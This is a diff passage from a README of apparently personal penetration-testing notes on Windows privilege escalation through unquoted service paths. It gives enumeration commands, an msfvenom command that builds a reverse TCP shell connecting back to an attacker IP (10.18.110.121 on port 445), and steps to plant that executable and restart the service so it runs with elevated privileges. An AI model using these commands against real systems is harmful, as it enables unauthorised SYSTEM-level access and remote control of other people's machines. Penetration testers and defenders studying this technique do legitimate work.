seeu-inspace/easyg/README.md

 5. Set a listener and start the service `net start <service>`

 **Unquoted Service Path**

+- `wmic service get name,displayname,pathname,startmode | findstr /v /i "C:\Windows"`
+  - note: if in "PathName" you don't see quotation, there might be a Priv Esc
+    1. Check which user is running it: `sc qc SERVICE_NAME`
+    2. check it with a command similar to the following to see if you have write priv: `powershell "get-acl -Path 'C:\Program Files (x86)\System Explorer' | format-list"`
+- If you have found an Unquoted Service Path:
+  - `Get-Acl -Path "C:\Program Files (x86)\service" | Format-List`
+    - see if you have write privileges (with `icacls`)
+  - `"service" | Get-ServiceACL | select -ExpandProperty Access`
+    - see if you can stop and start (restart) the service
+  - `msfvenom -p windows/shell_reverse_tcp LHOST=10.18.110.121 LPORT=445 -f exe -o shell.exe`
+  - copy the `shell.exe`, then:
+    1. `sc start "service"`
+    2. `Stop-Service -name "service"`
+    3. `Start-Service -name "service"`

+Another way
 1. Check: ["Microsoft Windows Unquoted Service Path Vulnerability"](https://www.tenable.com/sc-report-templates/microsoft-windows-unquoted-service-path-vulnerability)
 2. Query a service.
 If it runs with `SYSTEM` privileges (check `SERVICE_START_NAME`) and the `BINARY_PATH_NAME` value is unquoted and contains spaces, it's possible a privilege escalation
    - `sc qc <service>`